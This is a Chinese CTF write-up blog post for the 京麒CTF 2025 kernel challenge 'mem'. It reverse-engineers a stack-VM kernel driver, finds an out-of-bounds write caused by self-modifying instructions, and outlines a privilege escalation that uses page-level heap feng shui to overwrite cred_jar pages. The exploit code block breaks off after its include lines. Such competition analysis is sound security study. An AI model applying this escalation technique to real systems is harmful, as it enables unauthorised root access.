<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="第一个在赛时做出来的Kernel Pwn，太不容易了  防护检查.&#x2F;run.sh脚本中启用了smap,smep,kaslr防护，此外没什么特殊的文件系统经检验没有权限漏洞给了Kconfig，内核版本为Linux v6.6.91，较高版本，没有详细检查Kconfig中的条目比较平常的防护 逆向分析IDA反编译发现程序很复杂，尤其是memem_ioctl函数，第一眼还以为被ollvm混淆了 初始化函">
<meta property="og:type" content="article">
<meta property="og:title" content="[京麒CTF 2025] mem writeup">
<meta property="og:url" content="http://example.com/2025/05/26/2025jqctf-mem/index.html">
<meta property="og:site_name" content="Blog de Назриндак">
<meta property="og:description" content="第一个在赛时做出来的Kernel Pwn，太不容易了  防护检查.&#x2F;run.sh脚本中启用了smap,smep,kaslr防护，此外没什么特殊的文件系统经检验没有权限漏洞给了Kconfig，内核版本为Linux v6.6.91，较高版本，没有详细检查Kconfig中的条目比较平常的防护 逆向分析IDA反编译发现程序很复杂，尤其是memem_ioctl函数，第一眼还以为被ollvm混淆了 初始化函">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/images/2025jqctf-mem/win.jpg">
<meta property="article:published_time" content="2025-05-25T16:08:05.000Z">
<meta property="article:modified_time" content="2025-05-25T17:26:42.050Z">
<meta property="article:author" content="NazrinDuck">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="kernel">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/2025jqctf-mem/win.jpg">

<link rel="canonical" href="http://example.com/2025/05/26/2025jqctf-mem/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh'
  };
</script>

  <title>[京麒CTF 2025] mem writeup | Blog de Назриндак</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Blog de Назриндак</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">上不去下不来，卡在这了</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/05/26/2025jqctf-mem/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="NazrinDuck">
      <meta itemprop="description" content="Fâtih'in İstanbul'u fethettiği yaştasın!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog de Назриндак">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [京麒CTF 2025] mem writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2025-05-26 00:08:05 / Modified: 01:26:42" itemprop="dateCreated datePublished" datetime="2025-05-26T00:08:05+08:00">2025-05-26</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <blockquote>
<p>第一个在赛时做出来的Kernel Pwn，太不容易了</p>
</blockquote>
<h2 id="防护检查"><a href="#防护检查" class="headerlink" title="防护检查"></a>防护检查</h2><p><code>./run.sh</code>脚本中启用了smap,smep,kaslr防护，此外没什么特殊的<br>文件系统经检验没有权限漏洞<br>给了Kconfig，内核版本为<strong>Linux v6.6.91</strong>，较高版本，没有详细检查Kconfig中的条目<br>比较平常的防护</p>
<h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><p>IDA反编译发现程序很复杂，尤其是<code>memem_ioctl</code>函数，第一眼还以为被ollvm混淆了</p>
<p>初始化函数创建了一个名为<code>/dev/mememe</code>的设备，并提供了<code>open</code>, <code>read</code>, <code>write</code>和<code>ioctl</code>等功能</p>
<p>先分析<code>mememe_open</code>函数，发现程序调用了两个<code>kmalloc</code>，一个<code>alloc_page</code><br>前两个<code>kmalloc</code>貌似被加密了，无法静态分析其使用的是哪一个slab，后一个<code>alloc_page</code>申请的是order-0的page,并转成虚拟地址赋值给了一个地址偏移量。</p>
<p>仔细分析发现程序中貌似有个结构体，<code>memset</code>函数之后有很多地址赋值语句，不同的偏移地址赋值代表着不同的字段，不过目前还不清楚它们大部分的功能。</p>
<blockquote>
<p>字段名称是之后补充的</p>
</blockquote>
<figure class="highlight c"><figcaption><span>核心部分</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"> mememe = (vmmem *)v2;</span><br><span class="line">    *(_QWORD *)(v2 + <span class="number">8</span>) = <span class="number">4096LL</span>;</span><br><span class="line">    v5 = alloc_pages(<span class="number">0x500CC2</span>LL, <span class="number">0LL</span>);</span><br><span class="line">    <span class="keyword">if</span> ( v5 )</span><br><span class="line">    &#123;</span><br><span class="line">      v6 = v5;</span><br><span class="line">      mememe-&gt;page = (<span class="type">void</span> *)(page_offset_base + ((v5 - vmemmap_base) &lt;&lt; <span class="number">6</span>));</span><br><span class="line">      v7 = kmalloc_trace(</span><br><span class="line">             kmalloc_caches[<span class="number">14</span> * ((<span class="number">0x61C8864680B583EB</span>LL * (random_kmalloc_seed ^ retaddr)) &gt;&gt; <span class="number">60</span>) + <span class="number">3</span>],</span><br><span class="line">             <span class="number">3264LL</span>,</span><br><span class="line">             <span class="number">4LL</span>);</span><br><span class="line">      mememe-&gt;kmap = (__int32 *)v7;</span><br><span class="line">      <span class="keyword">if</span> ( v7 )</span><br><span class="line">      &#123;</span><br><span class="line">        v3 = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">memset</span>(mememe-&gt;page, <span class="number">0</span>, mememe-&gt;pagesize);</span><br><span class="line">        *mememe-&gt;kmap = <span class="number">0</span>;</span><br><span class="line">        mememe-&gt;length = <span class="number">0LL</span>;</span><br><span class="line">        mememe-&gt;var3 = <span class="number">0LL</span>;</span><br><span class="line">        mememe-&gt;rsp = <span class="number">-1</span>;</span><br><span class="line">        _mutex_init(&amp;mememe-&gt;mutex, <span class="string">&quot;&amp;priv-&gt;lock&quot;</span>, &amp;mememe_open___key);</span><br><span class="line">        *(_QWORD *)(a2 + <span class="number">200</span>) = mememe;</span><br><span class="line">        <span class="keyword">return</span> v3;</span><br><span class="line">      &#125;</span><br><span class="line">      _free_pages(v6, <span class="number">0LL</span>);</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p><code>mememe_read</code>与<code>mememe_write</code>内容较少且个防护很严格的，简单审计<code>mememe_release</code>函数发现没有UAF，直接分析<code>mememe_ioctl</code>函数</p>
<blockquote>
<p>IDA并没有很好地处理这里的逻辑，静态分析很难受</p>
</blockquote>
<p>分析发现该函数大概以中间的<code>memset</code>函数分为两小部分，且后半部分一直在用<code>if</code>或<code>switch</code>检验某个固定的变量的值，猜想是虚拟机指令处理部分，对不同的id执行不同的函数</p>
<p>结合之前的结构体以及程序逻辑，逆向还原虚拟机结构体：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">vmmem</span> // <span class="title">sizeof</span>=</span><span class="number">0xB8</span></span><br><span class="line">&#123;</span><br><span class="line">     <span class="type">char</span> *page;</span><br><span class="line">     __int64 pagesize;</span><br><span class="line">     __int64 length;</span><br><span class="line">     __int32 *kmap;</span><br><span class="line">     __int64 var3;</span><br><span class="line">     __int32 <span class="built_in">stack</span>[<span class="number">32</span>];</span><br><span class="line">     __int32 rsp;</span><br><span class="line">     <span class="comment">// padding byte</span></span><br><span class="line">     <span class="comment">// padding byte</span></span><br><span class="line">     <span class="comment">// padding byte</span></span><br><span class="line">     <span class="comment">// padding byte</span></span><br><span class="line">     __int64 mutex;</span><br><span class="line"> &#125;;</span><br></pre></td></tr></table></figure>

<p>其中<code>page</code>字段是<code>alloc_page</code>得到的order-0 page，里边存放的是将要分析的虚拟机指令，<code>kmap</code>字段为<code>kmalloc</code>得到的空间，存放栈顶元素，<code>stack</code>字段是虚拟机栈，<code>rsp</code>字段指向栈顶。</p>
<p>虚拟机指令结构体，各种指令操作如下所示：</p>
<blockquote>
<p>立即数直接用<code>uint32_t</code>会导致padding到8字节，或许需要显式align一下</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">insn</span> &#123;</span> <span class="comment">// sizeof=0x6</span></span><br><span class="line">  <span class="type">uint8_t</span> idx;</span><br><span class="line">  <span class="type">uint8_t</span> next;</span><br><span class="line">  <span class="type">uint16_t</span> imm1;</span><br><span class="line">  <span class="type">uint16_t</span> imm2;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// rsp &gt; 0 || rsp &lt; 30</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* insn:</span></span><br><span class="line"><span class="comment"> *  00_00_0000_0000</span></span><br><span class="line"><span class="comment"> *  id_nx_imm</span></span><br><span class="line"><span class="comment"> * eg:</span></span><br><span class="line"><span class="comment"> *  11_00_FFFF_FFFF</span></span><br><span class="line"><span class="comment"> * size: 0x6</span></span><br><span class="line"><span class="comment"> * curr_insn: idx</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * id:</span></span><br><span class="line"><span class="comment"> * 0:</span></span><br><span class="line"><span class="comment"> *  nop</span></span><br><span class="line"><span class="comment"> * 4:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] + stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 5:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] - stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 6:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] * stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 7:</span></span><br><span class="line"><span class="comment"> *  if stack[rsp] == 0 &#123;</span></span><br><span class="line"><span class="comment"> *    stack[rsp] = 0</span></span><br><span class="line"><span class="comment"> *    rsp will not change</span></span><br><span class="line"><span class="comment"> *  &#125; else &#123;</span></span><br><span class="line"><span class="comment"> *    stack[rsp - 1] = stack[rsp - 1] / stack[rsp]</span></span><br><span class="line"><span class="comment"> *    rsp--</span></span><br><span class="line"><span class="comment"> *  &#125;</span></span><br><span class="line"><span class="comment"> * 8:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] ^ stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 10:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = imm</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 11:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = page[imm]</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 12:</span></span><br><span class="line"><span class="comment"> *  page[imm] = stack[rsp] // ??? AAW</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 13:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 14:</span></span><br><span class="line"><span class="comment"> *  xchg stack[rsp], stack[rsp-1]</span></span><br><span class="line"><span class="comment"> * 15:</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 16:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &lt;&lt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 17:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &gt;&gt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 18:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &amp; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 19:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] | stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 20:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] == stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 21:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] != stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 22:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &lt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 23:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &gt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * NEXT:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  v14 = (idx + 2) + page[v14] + 1</span></span><br><span class="line"><span class="comment"> *  idx = (idx + 2) + page[v14]</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * STOP:</span></span><br><span class="line"><span class="comment"> *  kmap = stack[rsp]</span></span><br><span class="line"><span class="comment"> */</span></span><br></pre></td></tr></table></figure>

<p>其中<code>memset</code>函数之前的部分是检查部分，对部分指令进行了约束，防止访问越界</p>
<p>分析结束很容易发现有一个漏洞，由于指令都存在字段<code>page</code>里，我们可以利用id 12指令进行运行时修改page内原来的指令，造成page越界读和越界写原语</p>
<blockquote>
<p>这个任意读&#x2F;任意写的大小是DWORD(4字节)，不过可以以任意偏移无限触发，还是很强大的</p>
</blockquote>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>有了page层面的越界读写之后就好办了，我们可以通过堆喷和页级堆风水，造成该页面与<code>cred_jar</code>页面物理相邻的局面，在直接映射区的虚拟地址也相邻，从而利用越界写改写<code>cred_jar</code>直接一步提权</p>
<blockquote>
<p>甚至不需要利用<code>memem_read</code>功能，因为该方法无需任何地址泄漏</p>
</blockquote>
<h3 id="赛时策略"><a href="#赛时策略" class="headerlink" title="赛时策略"></a>赛时策略</h3><p>事实上，在构造order-0的页级堆风水应该堆喷order-1的pages，但是赛时我<del>嫌麻烦</del>没有去用<code>pgv</code>堆喷，而是直接堆喷<code>pipe_buffer</code>来获得大量的order-0 pages，这种情况下时间先后获得的两个页面大概率也物理相邻，成功率还是很高的</p>
<p>之后的操作就是先free id为奇数的<code>pipe_buffer</code>造成page hole,再打开该设备<code>/dev/mememe</code>，此时<code>mememe_open</code>函数中的<code>alloc_page</code>很大概率会取到之前free的<code>pipe_buffer</code>的page hole</p>
<p>下一步，我的策略是把剩下的<code>pipe_buffer</code>全部free掉，然后再用<code>setuid(1000)</code>堆喷<code>cred_jar</code>取走刚刚free的<code>pipe_buffer</code>的page，此时的<code>cred_jar</code>大概率会申请到<code>mememe-&gt;page</code>的相邻地址处（假设之前的步骤都成功）</p>
<p>最后在大量<code>fork</code>提权函数，并利用越界写覆写<code>cred_jar</code>提权。虽然假设了不少因素，本地成功率还是很高的</p>
<blockquote>
<p>远程成功率偏低了一点，大概5,6次才成功，但是本地试了十几次只有一次没有成功</p>
</blockquote>
<p><img src="/images/2025jqctf-mem/win.jpg" alt=":)"></p>
<h3 id="改进策略"><a href="#改进策略" class="headerlink" title="改进策略"></a>改进策略</h3><p>todo</p>
<h2 id="赛时Exp"><a href="#赛时Exp" class="headerlink" title="赛时Exp"></a>赛时Exp</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="comment">// #include &quot;./bpf_insn.h&quot;</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;./klog.h&quot;</span></span></span><br><span class="line"><span class="comment">// #include &quot;./kpwn.h&quot;</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="comment">// #include &lt;keyutils.h&gt;</span></span><br><span class="line"><span class="comment">// #include &lt;linux/if_packet.h&gt;</span></span><br><span class="line"><span class="comment">// #include &lt;linux/userfaultfd.h&gt;</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;net/if.h&gt;</span> <span class="comment">// 添加 if_nametoindex 函数的头文件</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;poll.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ipc.h&gt;</span></span></span><br><span 